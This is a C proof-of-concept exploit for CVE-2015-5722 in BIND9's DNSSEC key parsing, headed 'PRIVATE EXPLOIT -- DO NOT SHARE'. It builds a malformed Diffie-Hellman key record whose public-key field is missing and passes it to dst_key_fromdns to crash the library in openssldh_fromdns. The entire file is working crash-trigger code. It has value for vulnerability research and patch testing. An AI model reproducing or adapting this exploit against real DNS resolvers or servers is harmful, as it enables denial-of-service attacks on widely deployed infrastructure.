/*
* compile with:
*
* gcc -g -O2 -Wall -I/usr/include/bind9 CVE-2015-5722.c -lisc -ldns
*
* Crash is caused by not decrementing the r.length field in
* openssldh_fromdns.
*
* PRIVATE EXPLOIT -- DO NOT SHARE
* */
#include <isc/mem.h>
#include <isc/buffer.h>
#include <isc/entropy.h>
#include <dst/dst.h>
#include <dns/name.h>
#include <dns/fixedname.h>
#include <err.h>
int
main(void)
{
isc_mem_t *mctx = NULL;
if (isc_mem_create(0, 0, &mctx) != ISC_R_SUCCESS) {
errx(1, "isc_mem_create");
}
isc_entropy_t *ectx = NULL;
if (isc_entropy_create(mctx, &ectx) != ISC_R_SUCCESS) {
errx(1, "isc_entropy_create");
}
if (dst_lib_init(mctx, ectx, 0) != ISC_R_SUCCESS) {
errx(1, "dst_lib_init");
}
isc_buffer_t b;
isc_buffer_init(&b, "test.", 5);
isc_buffer_add(&b, 5);
dns_fixedname_t fname;
dns_fixedname_init(&fname);
dns_name_t *name = dns_fixedname_name(&fname);
if (dns_name_fromtext(name, &b, NULL, 0, NULL) != ISC_R_SUCCESS) {
errx(1, "dns_name_fromtext");
}
unsigned char blob[] = {
0, 0, /* flags */
0, /* proto */
2, /* alg */
0, 20, /* plen */
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
0, 20, /* glen */
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
0, 20, /* publen */
/* missing pub field */
};
isc_buffer_init(&b, blob, sizeof(blob));
isc_buffer_add(&b, sizeof(blob));
dst_key_t *key = NULL;
isc_result_t ret = dst_key_fromdns(name, /* class */ 1, &b, mctx, &key);
if (ret != ISC_R_SUCCESS) {
errx(1, "dst_key_fromdns: %s", isc_result_totext(ret));
}
return 0;
}